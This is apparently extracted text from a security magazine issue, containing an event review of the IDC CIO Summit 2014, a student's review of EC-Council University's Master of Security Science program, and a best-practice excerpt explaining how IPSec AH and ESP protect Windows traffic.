The first part : starts with enumerating some of the generic top mobile security issues and solutions such as application isolation issues, transport layer security issues, physical security issues and privacy issues. Then, the authors dive into the platform specific security architectures and features’ details. Starting with Android, to iPhone, Windows Mobile, Blackberry, J2ME, Symbian, and ending with WebOS; they offer a comprehensive overview of core security components and security features of OS components; detailing how they work and how they can be used by a developer. Components described include: inter-process communication mechanisms, background services, storage access, notifications, application permissions, clipboard access, sockets, web networking, application updating, signing and packaging. At the end of some chapters, a bullet-styled conclusion provides the reader with actionable development tips for a specific platform which I find very useful and would comprise a great coding security checklist for developers.

In the second :part, the authors explore some common services introduced by the prevalence of mobiles that need special care from a security and privacy point of view. The services described include SMS, bluetooth and geolocation services. In addition, the authors dedicate a chapter to introduce enterprise mobile security concepts and practices for building secure enterprise enabled mobile applications.

Bluekaizen has an active online community at Facebook , check us at Facebook.com/bluekaizen.original


ww

w.b

luek

aize

n.or

g

WWW.Bluekaizen.org

Revi

ews

On 24th and 25th Feb., The Jumeira beach hotel in Dubai hosted the annual Middle East CIO summit event by IDC.

CIO in the new business world of tech+transformation

IDC CIO Summit 2014

CIO summit is an annual event targeting CIOs from different countries in the Middle East, different sectors and different cultures for one purpose; that is to present the latest technologies, and provide them with updated strategies to meet the challenges of today’s development.

This year’s event was more special than every year. the Number of sponsors and exhibitors is doubled. CIO Summit 2014 was showing more than 30 exhibitors and sponsors this year. Furthermore the number of attendees had been increased to nearly 250-300 CIO from UAE, Oman, Qatar, Bahrain and others In CIO Summit 2014 IDC introduced a new terminology: the Third platform; most sessions were focusing on presenting this new concept to attendees. According to IDC, The third platform is the near future for IT where companies are moving to four main technologies (Cloud, Mobility, Big Data, and social business). The below picture is describing more and it was nearly in all speakers slides

Event Review


Also we had another interview with Ahmad Mokhtar from vision solutions where we talked about their products and especially Double take . you can watch the full interview from here:http://www.bluekaizen.org/interview-with-ahmed-mokhtar-vice-president-of-sales-growth-market-vision-solutions/

Nader haneinsecurity advisor of black berry , was there and we had a nice chat about black berry security and how different governments had some concerns in deploying blackberry solutions . You can watch the full interview from here: http://www.bluekaizen.org/interview-with-nader-hanein/

Overall, the event was a good opportunity for both CIOs and vendors, for one to know the latest products in the market and for the other to have an opportunity to present their products and solutions.

Finally one advice was given to attendees for the best practice is always going back to basics when it comes to security

“You can spend lots of money but without the right policy you have no security” stated Sudhir Menon , Senior Manager Security Services , Etisalat .

The 2 days conference started by a keynote from H.E Sheikh Nahyan Mabarak Al Nahyan , Minister of culture and youth ,UAE.

The event topic was mainly going around the idea of tech and transformation and how the CIO summit can deal with the inevitable change.“change before you have to “ noted sa’di Awienat CTO and GS leader Gulf ,EMC

In his session “The time to redefine it is now!” he showcased that the problem is mainly that the companies are taking IT innovation for granted. And that companies does not have enough resources when it comes to security especially staffing, emphasising that in the upcoming years the specialisation in security will be highly needed and that a good candidate will have to be technical focused as well as business focused.

The rest of the sessions were presented in the main conference room, a variety of speakers talking about interesting topics; to name a few of the sessions: • Transformation 2020 presented by Crawford del prete, EVP, IDC• Digital revolution presented by Abduallah Hashim, SVP, Etisalat

Then sessions were divided into 3 break out sessions, each of different topics, we made sure to attend the one about security called; Envisioning a new approach of information security.The session featured a panel discussion moderated by IDC participants: • Bill hau, Vice President, FireEye• Nader Henein, Regional Directory, product security, BlackBerry• Mohamed Amin, Senior Security Researcher, Kaspersky Labs • Mukund Seetharaman, General Manager, Wipro.• Followed by a presentation from Shaimaa Almarzouqi from GASCO about the risk of Social Media and the risk of unlimited exposure online.

Also, Security Kaizen magazine made an interview with infowatch , a company specialized in DLP ( Data leakage prevention ). You can watch the full interview on our website here: http://www.bluekaizen.org/interview-with-andrey-sokurenko-business-development-director-info-watch/


ww

w.b

luek

aize

n.or

g

Network Engineer at AlexFert

Revi

ews

Master of Security Science

By. EC-Council University(MSS)

• Bachelor’s degree from an accredited institution in computer science or related field is a must• TOEFL for non-English speakers with minimum 550• At least 2 years experience in IT field• Two letters of recommendation• Personal Statement• Copy of the Undergraduate transcript in English and Passport• 100 USD application feeThese requirements have been modified as of late, so please refer to their website to understand the latest admission details. [1]

Course Review

It is the first program in information security provided 100% online. It aims to prepare well-educated professionals in information security and assurance. I was in the 1st group that enrolled in this program from Egypt. EC-Council and New Horizon training Center launched this program in Alexandria in 2009 and facilitated all the enrollment procedures for selected network professionals in Alexandria. The admission requirement was very strict at that time.


required to complete the necessary course work. You can enroll in two courses maximum each term and you have to carefully balance between work, study and personal commitments. The core courses are heavy and consist of projects and many requirements that must be fulfilled.

The minimum grad to pass the course is C (70%) and you have to maintain a cumulative GPA of 3.0/4.0 to continue the program and earn the degree.Instructors are very friendly and helpful. They will provide guidance and assistance during the course. They are going to evaluate you weekly for each assignment. EC-Council University has strict Academic Honesty Policy’s toward cheating, plagiarism, fabricating and unauthorized collaboration between students. They have software that is able to detect “copy-and-paste”, paragraph and percentage matching with any other documents that exist within their portal, so don’t try this technique and use your own words.

Course StructureIt is required to have 36 credit hours to earn the degree. The courses were divided into two categories (Core and Electives). It is mandatory to take 6 core courses in information security (18 credit hours), and then select 6 courses including a capstone project (18 credit hours).There is good news for certified CEH and other EC-Council Certifications, including CHFI and ECSA/LPT. You can transfer these certifications into credit hours and skip their related courses.

The Master’s of Security Science program solidifies an excellent mix of executive leadership and tactical information security skills by educating individuals in industry leading technologies, executive leadership, psychology, management, law and ethics. Focusing on topics like “The hackers mind,” “ethical hacking”, and even “global leadership” provides a very unique skill set arming the graduate with the tools, knowledge, and ability to lead effectively against advanced persistent threats such as individually motivated hacktivists, state sponsored organizations, even organized crime exploiting digital technologies.

Mode of StudyMSS is 100% online study, allowing you to complete course work in a flexible time frame that fits your own schedule. You have to have a computer and internet connectivity to be able to participate in class activities.Each course is represented in ten-week courses that constitute 3 credits per course. All courses consti-tute approximately 135 hours of work per course (reading, online discussion forum postings, assign-ments, papers, and supplementary requirements). Ac-tually you will have a mix of these assignments each week and submit the entire requirements through the Learning Management System (LMS) portal before the weekly deadline. Time and stress management are

Core (3cr each) 6 18

No of Courses

Total Credit Earned

Elective (3cr each) 5 15

Capstone Project (3 cr) 1 3

Total 12 36

My Personal ExperienceI started this program in 2009 in Alexandria, Egypt. We were 10 students and the first group from Egypt enrolled in EC-Council University. The course structure and credit hours were different (42 instead of 36 now). Tuition was much less than now and the portal was very poor. During my study from 2009 till 2013 they have made a lot of changes to the program, making it more attractive including trying to obtain the DETC accreditation. Some of the recent changes include access to virtual labs to do on-hands exercises, proctored exams, courses are now 10 weeks instead of 8, 2 different sub-specializations (management and information assurance), video streamed lectures (work in progress), more payment methods, updated LMS among others. They now also offer a special course in Cloud Computing.The things that attracted me most about the program was the diversity of security related courses, from general security, to Wireless Hacking, Ethical Hacking, Forensics, Disaster Recovery, Business Continuity, Pentesting, Secure Programming, Securing Linux, Leadership, Project Management and others.I didn’t seek the Master Degree as much as I was seeking diversified knowledge in information security.MSS program provides you with wide and in-depth knowledge in various information security domains. You can easily become CISSP certified after finishing this program. The Capstone project is the final step before graduation. It is an intense course that covers all the areas studied in the program. After successfully completing the Capstone, you have to pay $300 to receive your graduation certificates and 3 copies of the official transcript by courier.

Books and MaterialsEC-Council University does not supply books, tools, electronic equipment or electronic supplies for each term of instruction. Although you have to pay for access to an online library provided by EC-Council University, additional book purchases may be required for certain courses. Some of these books are not easy to get because of cost and shipping problems. Some of these books can be found online as softcopies but through illegal channels. Other books are available in public libraries. I noticed six courses that have this issue, so you have to check the availability of the books before selecting these courses.The online library services of Books 24/7 or academica.com are useful and consist of rich materials. Most of the courses are delivered with educational slides that fully cover the objective of the course.

Program CostMSS from EC-Council is an expensive degree. You will pay a total of $17,500 during your study period, but wait this is just the official cost. Registration, application, library and technology fees $675 are paid one-time at the beginning. Another $300 will be paid at graduation time. Students pay tuition on a course-by-course basis at registration period before the start of the term. The expected completion date of the program is four years maximum. Payment can be made using PayPal, credit card or wire transfer. Officially, tuition per credit hour is $450 but they offer a discount of up to 50%, which reduces the total cost to about $9,500. EC-Council offers this discount based on geographic location and international currency values.You have to determine your budget before starting this program because you will pay around $2400 per annum for 4 years…. Still expensive?

AccreditationEC-Council University is an applicant for DETC [2] accreditation. It is expected to complete all the DETC processes by 2014.You have to consider that MSS is a professional Master’s, not an academic one, because it is not accredited yet. Students considering continuing their education or transferring to another institution must not assume that credits or degrees earned at EC-Council University will be accepted by the receiving institution.



About EC-Council UniversityEC-Council University is a leading provider of information security education and training to professionals in the security and military fields, and post-graduate students. It is the developer of the ‘Master of Security Science,’ a 100 percent online degree program designed to provide students with a solid foundation in information security. The MS information security course is suitable for students with a wide range of previous security experience. The MSS program is offered online, enabling students to access classes from any location in the world and at any time. The University also offers several certifications, including Information Security Professional, IT Analyst, Digital Forensics and Executive Information Assurance, IT Disaster Recovery Certifications, Digital Forensics and Executive Information.

Reference:[1] https://www.eccuni.us/Portals/0/Doc/EC-Council-University-Prospectus-brochure-2013.pdf[2] http://www.detc.org/

The reality is that academic degrees don’t carry much weight in the information security business. For instance, CISSP and other certifications are more acceptable than academic degrees from a reputable university. No doubt EC-Council is well known in the certification market, but you will not find a similar program to the MSS. This program gives you the opportunity to obtain a professional and academic degree, after the program receives accreditation.MSS is expensive compared to any other certificate. EC-Council certainly markets itself aggressively in the IT security space. That along with the overseas stamp of earning an American University degree might help ex-plain how it sells its high-priced unaccredited degrees. It might be legitimate and valuable if it became widely known and accredited.

Master of Security Science SWOT Analysis

ww

w.b

luek

aize

n.or

g

Best

Pra

ctic

e

Encrypting WindowsTraffic Using IPSec

Using IPSec By its design, TCP/IP is an open protocol created to connect heterogeneous computing environments with the least amount of overhead possible. As is often the case, interoperability and performance design goals do not generally result in security—and TCP/IP is no exception to this. TCP/IP provides no native mechanism for the confidentiality or integrity of packets. To secure TCP/IP, you can implement IP Security. IPSec implements encryption and authenticity at a lower level in the TCP/IP stack than application-layer protocols such as Secure Sockets Layer (SSL) and Transport Layer Security (TLS). Because the protection process takes place lower in the TCP/IP stack, IPSec protection is transparent to applications. IPSec is a well-defined, standards-driven technology.

Dear Security Kaizen magazine readers, As part of the Defense-in-Depth strategy, I chose to introduce the topic in this issue to you by taking an excerpt from one of my favorite references in my library, “Microsoft Windows Security Resource Kit, Ben Smith and Brian Komar with Microsoft Security Team, Microsoft Press 2003, ISBN 0-7356-1868-2

Chief Technology OfficerAndromeda Labs



Bluekaizen website is updated, you can browse through the issues and articles. You can even leave comments on article and communicate with authors

The IPSec process encrypts the payload after it leaves the application at the client and then decrypts the payload before it reaches the application at the server. An application does not have to be IPSec aware because the data transferred between the client and the server is normally transmitted in plaintext.IPSec is comprised of two protocols that operate in two modes with three different authentication methods. IPSec is policy driven and can be deployed centrally by using Group Policy. To deploy IPSec, you must determine the

• Protocol

• Mode

• Authentication methods

• Policies

Securing Data Transmission with IPSec Protocols As mentioned, IPSec is comprised of two protocols: IPSec Authentication Header (AH) and IPSec Encapsulating Security Payload (ESP). Each protocol provides different services; AH primarily provides packet integrity services, while ESP provides packet confidentiality services. IPSec provides mutual authentication services between clients and hosts, regardless of whether AH or ESP is being used.

Using AH IPSec AH provides authentication, integrity, and anti-replay protection for the entire packet, including the IP header and the payload. AH does not provide confidentiality. When packets are secured with AH, the IPSec driver computes an Integrity Check Value (ICV) after the packet has been constructed but before it is sent to the computer. With Microsoft Windows XP or later, you can use either the HMAC SHA1 or HMAC MD5 algorithm to compute the ICV. Figure 9-3 shows how AH modifies an IP packet.

Figure 9-3. AH modifications to an IP packet The fields in an AH packet includes these:• Next Header Indicates the protocol ID for the header that follows the AH header. For example, if the encrypted data is transmitted using TCP, the next header value would be 6, which is the protocol ID for TCP.

• Length Contains the total length of the AH.

• Security Parameters Index (SPI) Identifies the security association (the IPSec agreement between two computers) that was negotiated in the Internet Key Exchange (IKE) protocol exchange between the source computer and the destination computer.

• Sequence Number Protects the AH-protected packet from replay attacks in which an attacker attempts to resend a packet that he has previously intercepted, such as an authentication packet, to another computer. For each packet issued for a specific security association (SA), the sequence number is incremented by 1 to ensure that each packet is assigned a unique sequence number. The recipient computer verifies each packet to ensure that a sequence number has not been reused. The sequence number prevents an attacker from capturing packets, modifying them, and then retransmitting them later.

• Authentication Data Contains the ICV created against the signed portion of the AH packet by using either HMAC SHA1 or HMAC MD5. The recipient performs the same integrity algorithm and compares the result of the hash algorithm with the result stored within the Authentication Data field to ensure that the signed portion of the AH packet has not been altered in transit. Because the TTL, Type of Service (TOS), Flags, Fragment Offset, and Header Checksum fields are not used in the ICV, packets secured with IPSec AH can cross routers, which can change these fields.


• Sequence Number Protects the SA from replay attacks. This field is incremented by 1 to ensure that packets are never received more than once. If a packet is received with a previous sequence number, that packet is dropped.

The ESP trailer is inserted after the application data from the original packet and includes the following fields:

• Padding A variable length from 0–255 bytes that brings the length of the application data and ESP trailer to a length divisible by 32 bits so that they match the required size for the cipher algorithm.

• Padding Length Indicates the length of the Padding field. After the packet is decrypted, this field is used to determine the length of the Padding field.

• Next Header Identifies the protocol used for the transmission of the data, such as TCP or UDP.

Following the ESP trailer, the ESP protocol adds an ESP authentication trailer to the end of the packet. The ESP authentication trailer contains a single field:

• Authentication Data Contains the ICV, which verifies the originating host that sent the message and ensures that the packet was not modified in transit. The ICV uses the defined integrity algorithm to calculate the ICV. The integrity algorithm is applied to the ESP header, the TCP/UDP header, the application data, and the ESP trailer.

ESP provides integrity protection for the ESP header, the TCP/UDP header, the application data, and the ESP trailer. ESP also provides inspection protection by en-crypting the TCP/UDP header, the application data, and the ESP trailer.

Using ESP ESP packets are used to provide encryption services to transmitted data. In addition, ESP provides authentication, integrity, and antireplay services. When packets are sent using ESP, the payload of the packet is encrypted and authenticated. In Windows XP or later, the encryption is done with either Data Encryption Standard (DES) or 3DES, and the ICV calculation is done with either HMAC SHA1 or HMAC MD5.

ESP encrypts the TCP or UDP header and the application data included within an IP packet. It does not include the original IP header unless IPSec tunnel mode is used. Figure 9-4 shows how ESP modifies an IP packet.

Figure 9-4. ESP modifications to an IP packet

The ESP header has two fields that are inserted between the original IP header and the TCP or UDP header from the original packet:

• Security Parameters Index (SPI) Identifies the SA that was negotiated between the source computer and the destination computer for IPSec communication. The combination of the SPI, the IPSec protocol (AH or ESP), and the source and destination IP addresses identifies the SA used for the IPSec transmission within the ESP packet.

TIP When designing an IPSec solution, you can combine AH and ESP protocols in a single IPSec SA. Although both AH and ESP provide integrity protection to transmitted data, AH protects the entire packet from modification, while ESP protects only the IP payload from modification.